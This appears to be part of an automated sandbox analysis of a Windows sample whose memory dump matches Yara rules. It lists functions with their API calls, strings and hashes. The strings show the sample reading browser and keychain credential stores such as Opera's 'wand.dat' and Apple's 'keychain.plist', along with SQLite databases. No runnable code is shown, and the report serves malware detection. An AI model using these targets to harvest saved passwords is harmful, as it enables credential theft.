                                                  • String ID:
                                                  • API String ID: 3384217055-0
                                                  • Opcode ID: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
                                                  • Instruction ID: 295c5a0bc2866328f8dcc37ada2a4d99e769f04d629d2bea2717987aff5dfa66
                                                  • Opcode Fuzzy Hash: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
                                                  • Instruction Fuzzy Hash: 01217C72E10248BBDB18DAA5DC56E9F73ECEB44740F50042AB512D7281EB78E644C765
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  • String ID:
                                                  • API String ID: 368790112-0
                                                  • Opcode ID: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
                                                  • Instruction ID: 5db9a22820b402d4d4dd4a010236648e296a7231ae54e5ee969484aed16c8927
                                                  • Opcode Fuzzy Hash: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
                                                  • Instruction Fuzzy Hash: D301F0B174070077D335AA35CC03F1A73E49FA1714F400E1DF152666C2D7F8A105866D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004154B8
                                                  • memset.MSVCRT ref: 004154E8
                                                    • Part of subcall function 0041538D: memset.MSVCRT ref: 004153AA
                                                    • Part of subcall function 0041538D: UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
                                                    • Part of subcall function 00414EFE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F2A
                                                    • Part of subcall function 00414EFE: SetEndOfFile.KERNEL32(?), ref: 00414F54
                                                    • Part of subcall function 00414EFE: GetLastError.KERNEL32 ref: 00414F5E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$File$ErrorLastUnlockUnothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: %s-shm$,A
                                                  • API String ID: 1271386063-2158068007
                                                  • Opcode ID: e97150ecd3292b0c1fc6f67ffbb4081b9a3a76a2bb60b8d44e9283291b6bd327
                                                  • Instruction ID: 8012e8fd2c705de7aa363bc2bd32bd15ad04531b7aa24a5a7ab2fd91cc4b7507
                                                  • Opcode Fuzzy Hash: e97150ecd3292b0c1fc6f67ffbb4081b9a3a76a2bb60b8d44e9283291b6bd327
                                                  • Instruction Fuzzy Hash: B1510671504B05FFD710AF21DC02BDB77A6AF80754F10481FF9299A282EBB9E5908B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004158E7
                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 00415912
                                                  • GetLastError.KERNEL32 ref: 00415939
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041594F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                  • String ID:
                                                  • API String ID: 1661045500-0
                                                  • Opcode ID: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
                                                  • Instruction ID: 02e61587b06ba7d058713df3830c0e33945dcb010177779d6ae1e8dc7ea6695b
                                                  • Opcode Fuzzy Hash: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
                                                  • Instruction Fuzzy Hash: B6518EB4214B02DFD724DF25C981AA7B7E9FB84315F10492FE88286651E734E854CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004132EA: memset.MSVCRT ref: 00413304
                                                  • memcpy.MSVCRT ref: 0042C42D
                                                  Strings
                                                  • virtual tables may not be altered, xrefs: 0042C384
                                                  • Cannot add a column to a view, xrefs: 0042C39A
                                                  • sqlite_altertab_%s, xrefs: 0042C3FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                  • API String ID: 1297977491-2063813899
                                                  • Opcode ID: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
                                                  • Instruction ID: 3e8a37011c5d834ac6e6d4f8fd11fd3d4e87e0ccd438cada7bf19ffd6667b676
                                                  • Opcode Fuzzy Hash: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
                                                  • Instruction Fuzzy Hash: 03419D71A00615AFDB10DF69D881A5EB7F0FF08314F24856BE8489B352D778EA51CB88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: $, $CREATE TABLE
                                                  • API String ID: 3510742995-3459038510
                                                  • Opcode ID: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                  • Instruction ID: 75c0c8dac0447bb43292008ef446c40d7ab48a9469891862f1914eead86e2b05
                                                  • Opcode Fuzzy Hash: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                  • Instruction Fuzzy Hash: C3518171E00219DFCF10DF9AD4856AEB7B5FF44309F64809BE841AB205D778AA45CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004047A1
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                    • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                    • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                    • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                    • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                    • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
                                                    • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
                                                    • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
                                                    • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
                                                    • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
                                                    • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
                                                    • Part of subcall function 00407AB6: GetOpenFileNameW.COMDLG32(?), ref: 00407AFF
                                                    • Part of subcall function 00407AB6: wcscpy.MSVCRT ref: 00407B0D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                  • String ID: *.*$dat$wand.dat
                                                  • API String ID: 3589925243-1828844352
                                                  • Opcode ID: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                  • Instruction ID: 6d0f55f818233349c8d1636aac4371a0276c995c789a620d4a51b657e5e4e923
                                                  • Opcode Fuzzy Hash: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                  • Instruction Fuzzy Hash: 6F419971A04206AFDB14EF61D885AAE77B4FF40314F10C42BFA05A71C2EF79A9958BD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
                                                    • Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B
                                                  • wcslen.MSVCRT ref: 0040CBEF
                                                  • _wtoi.MSVCRT ref: 0040CBFB
                                                  • _wcsicmp.MSVCRT ref: 0040CC49
                                                  • _wcsicmp.MSVCRT ref: 0040CC5A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                  • String ID:
                                                  • API String ID: 1549203181-0
                                                  • Opcode ID: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                  • Instruction ID: 2e88af878a7a0ebae712eab1be6a0374a06ab0ac9bbd2c3eb3becf244d067ed8
                                                  • Opcode Fuzzy Hash: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                  • Instruction Fuzzy Hash: C3416D31900204EBEF21DF59C5C4A9DBBB4EF45319F1546BAEC09EB3A6D638D940CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @|=D
                                                  • API String ID: 3510742995-4242725666
                                                  • Opcode ID: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                  • Instruction ID: e04d1c669876fac24280ac48723ffca9e388da4b41f072ca806e7767fffd92f4
                                                  • Opcode Fuzzy Hash: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                  • Instruction Fuzzy Hash: 19113BF29003047BDB348E66DC84C5A77A8EB603987000E3EF90696291F675DF69C6D8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: -+A$-+A$Y,A
                                                  • API String ID: 2221118986-4154596189
                                                  • Opcode ID: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
                                                  • Instruction ID: 1dfdef816599cc938eba6c7f1cf8632c899ce6bbbbec6bb0dc4dd89a5a59c02f
                                                  • Opcode Fuzzy Hash: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
                                                  • Instruction Fuzzy Hash: 482156799417008FD3268F0AFE0565AB7E5FBE2702724413FE201D62B2D7B4489A8F8C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  • Opcode ID: 2bd6b428f8dbf6c8ba8eecf3f59a287ad605b09a5cb6ba98fc7a768114adc393
                                                  • Instruction ID: d20edd04bd2483e58964879576c48f2ebc5a647496c0cba51e85d391a6ad2c86
                                                  • Opcode Fuzzy Hash: 2bd6b428f8dbf6c8ba8eecf3f59a287ad605b09a5cb6ba98fc7a768114adc393
                                                  • Instruction Fuzzy Hash: 0D118C71204601AFD328DF2DCA91A26F7E5FFD8340B60892EE4DAC7385EA75E801CB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00411ABC
                                                    • Part of subcall function 00407BF7: _snwprintf.MSVCRT ref: 00407C3C
                                                    • Part of subcall function 00407BF7: memcpy.MSVCRT ref: 00407C4C
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00411AE5
                                                  • memset.MSVCRT ref: 00411AEF
                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00411B11
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                  • String ID:
                                                  • API String ID: 1127616056-0
                                                  • Opcode ID: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
                                                  • Instruction ID: 7dd1a1e3bfb09d1cc1018fb107044e1a6d1141f919409e292c6c821828e7f11b
                                                  • Opcode Fuzzy Hash: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
                                                  • Instruction Fuzzy Hash: 48118271500119BFEF11AF61DD02EDE7BB9EF04741F100066FF05B2060E675AA608BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SHGetMalloc.SHELL32(?), ref: 004123DC
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0041240E
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00412422
                                                  • wcscpy.MSVCRT ref: 00412435
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                  • String ID:
                                                  • API String ID: 3917621476-0
                                                  • Opcode ID: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
                                                  • Instruction ID: 5cda3e6a61a15ee9057d47663b3b2e0c0e874c437a77379260a47c7555d96391
                                                  • Opcode Fuzzy Hash: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
                                                  • Instruction Fuzzy Hash: C5110CB5A00208AFDB00DFA9D9889EEB7F8FF49714F10406AE905E7200D779EB45CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: sqlite_master
                                                  • API String ID: 438689982-3163232059
                                                  • Opcode ID: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
                                                  • Instruction ID: ee6e5cfbbe52718914f41d47f1c84030a85cc49ac4fd556a51d86816da10b362
                                                  • Opcode Fuzzy Hash: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
                                                  • Instruction Fuzzy Hash: 6901B972900218BAEB11EFB18D42FDDB77DFF04315F50405AF60462142D77A9B15C7A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                    • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                    • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                  • _snwprintf.MSVCRT ref: 0040CEFB
                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040CF60
                                                    • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                    • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                  • _snwprintf.MSVCRT ref: 0040CF26
                                                  • wcscat.MSVCRT ref: 0040CF39
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                  • String ID:
                                                  • API String ID: 822687973-0
                                                  • Opcode ID: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
                                                  • Instruction ID: 10942a5e8a652da15fc5691646fc128facbf295aae85401a998ce48512d7e6da
                                                  • Opcode Fuzzy Hash: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
                                                  • Instruction Fuzzy Hash: 8F0184B19403057AE720E775DC8AFBB73ACAF40709F04046AB719F21C3DA79A9454A6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,00414D8E,?), ref: 00414C81
                                                  • malloc.MSVCRT ref: 00414C88
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74B05970,?,00414D8E,?), ref: 00414CA7
                                                  • free.MSVCRT(00000000,?,74B05970,?,00414D8E,?), ref: 00414CAE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$freemalloc
                                                  • String ID:
                                                  • API String ID: 2605342592-0
                                                  • Opcode ID: 1562b6304e5c60342503921195ce0066c0efbc861a8a386339b4f0c24ca6086c
                                                  • Instruction ID: 08e12ed7d8240a3e2c5be9bdce3f46534c50a62d4f36ceba048af803e5c5c189
                                                  • Opcode Fuzzy Hash: 1562b6304e5c60342503921195ce0066c0efbc861a8a386339b4f0c24ca6086c
                                                  • Instruction Fuzzy Hash: CBF0E9B260A21D7E76006FB59CC0C3B7B9CD7863FDB21072FF510A2180F9659C0116B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004153AA
                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004153D6
                                                  • GetLastError.KERNEL32 ref: 004153E4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                  • String ID:
                                                  • API String ID: 3727323765-0
                                                  • Opcode ID: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
                                                  • Instruction ID: b4c6314a975e1eba122d49f899d78a16df92238a1a9f5a4b2f2908291fae13bb
                                                  • Opcode Fuzzy Hash: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
                                                  • Instruction Fuzzy Hash: 7201D131100608FFDB219FA4EC848EBBBB8FB80785F20442AF912D6050D6B09A44CF25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00401B27
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                  • wcslen.MSVCRT ref: 00401B40
                                                  • wcslen.MSVCRT ref: 00401B4E
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
                                                  • String ID: Apple Computer\Preferences\keychain.plist
                                                  • API String ID: 3183857889-296063946
                                                  • Opcode ID: 8006b7ae7f5b9b2d5e72903c8d65ba76eb4ffe7052016a765288ea2a00793178
                                                  • Instruction ID: 16ca9930086f175389a7ca6d9dd60f6601f6a2e2e4035c9292d9b79f31a3f5d2
                                                  • Opcode Fuzzy Hash: 8006b7ae7f5b9b2d5e72903c8d65ba76eb4ffe7052016a765288ea2a00793178
                                                  • Instruction Fuzzy Hash: F8F0FE7290531476E720A7559C89FDA736C9F00318F6005B7F514E10C3F77CAA5446AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004030A6
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 004030C3
                                                  • strlen.MSVCRT ref: 004030D5
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004030E6
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
                                                  • Instruction ID: e51875297eda531c80c3ec5ec415ee795d437164a5b9689062039e3667910632
                                                  • Opcode Fuzzy Hash: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
                                                  • Instruction Fuzzy Hash: 56F04FB680022CBEFB15AB949DC5DEB776CDB04254F0001A2B709E2041E5749F448B78
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040BA78
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00443980,00000000,00000000,00000000,?,00000000,00000000), ref: 0040BA91
                                                  • strlen.MSVCRT ref: 0040BAA3
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040BAB4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                  • Instruction ID: f1b04ddda804f0d23e85d9b3a1a681265272c1a7bd8491b11875ee0cd1c6d5d4
                                                  • Opcode Fuzzy Hash: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                  • Instruction Fuzzy Hash: 7CF06DB780022CBEFB059B94DDC9DEB77ACDB04258F0001A2B709E2042E6749F44CB78
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004076CD: memset.MSVCRT ref: 004076EC
                                                    • Part of subcall function 004076CD: GetClassNameW.USER32 ref: 00407703
                                                    • Part of subcall function 004076CD: _wcsicmp.MSVCRT ref: 00407715
                                                  • SetBkMode.GDI32(?,00000001), ref: 00411794
                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004117A2
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004117B0
                                                  • GetStockObject.GDI32(00000000), ref: 004117B8
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                  • String ID:
                                                  • API String ID: 764393265-0
                                                  • Opcode ID: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                  • Instruction ID: 4524e9a356975b07e10c0673c8b36924071ef161512cc5bea393be377801c3c3
                                                  • Opcode Fuzzy Hash: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                  • Instruction Fuzzy Hash: 9AF0A435100209BBDF112F64DC05BDD3F61AF05B25F104636FA25541F5CF769990D648
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$DialogHandleModuleParam
                                                  • String ID:
                                                  • API String ID: 1386444988-0
                                                  • Opcode ID: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                  • Instruction ID: 350a086b8d7ad7ad16c9f4c49a9849c7d3de4f0e2d0f3119e9b48998a0ebe44a
                                                  • Opcode Fuzzy Hash: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                  • Instruction Fuzzy Hash: 49F0A731680310BBEB70AFA4BD4AF163A919705F57F20043AF644A60E2C7B585558B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 004048DE
                                                    • Part of subcall function 00412455: LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,004048E6,00000000), ref: 0041245E
                                                    • Part of subcall function 00412455: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                    • Part of subcall function 00412455: FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                  • GetDlgItem.USER32 ref: 004048F0
                                                  • GetDlgItem.USER32 ref: 00404902
                                                  • GetDlgItem.USER32 ref: 00404914
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Item$Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 2406072140-0
                                                  • Opcode ID: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                  • Instruction ID: 27d5e7a410d711f85fb169ee5f4284aad0304eb1bf7711d039073b83f91ac3c5
                                                  • Opcode Fuzzy Hash: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                  • Instruction Fuzzy Hash: 33F01CB18043026BCB313F72DC09D6FBAADEF84310B010D2EA1D1D61A1CFBE94618A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0040DA6F
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 0040DABB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InvalidateMessageRectSend
                                                  • String ID: <M@
                                                  • API String ID: 909852535-3778786622
                                                  • Opcode ID: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                  • Instruction ID: 05eea1ce1b03382e5db893e26ff0cd35ef39184770bc15fe2d13ad66f6086966
                                                  • Opcode Fuzzy Hash: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                  • Instruction Fuzzy Hash: 89518430E003049ADB20AFA5C845F9EB3A5AF44324F51853BF4197B1E2CAB99D89CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcschr.MSVCRT ref: 0040BB00
                                                  • wcschr.MSVCRT ref: 0040BB0E
                                                    • Part of subcall function 004080BF: wcslen.MSVCRT ref: 004080DB
                                                    • Part of subcall function 004080BF: memcpy.MSVCRT ref: 004080FE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcschr$memcpywcslen
                                                  • String ID: "
                                                  • API String ID: 1983396471-123907689
                                                  • Opcode ID: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                  • Instruction ID: 425732c6536ade4c189e7d45363e94d8349111ce0189a23fa1b0a907d348dab1
                                                  • Opcode Fuzzy Hash: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                  • Instruction Fuzzy Hash: D2317E31904204ABDF04EFA5C8419EEB7F8EF44364B20816BE855B72D5DB78AA41CADC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
                                                  • _memicmp.MSVCRT ref: 004092A6
                                                  • memcpy.MSVCRT ref: 004092BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FilePointer_memicmpmemcpy
                                                  • String ID: URL
                                                  • API String ID: 2108176848-3574463123
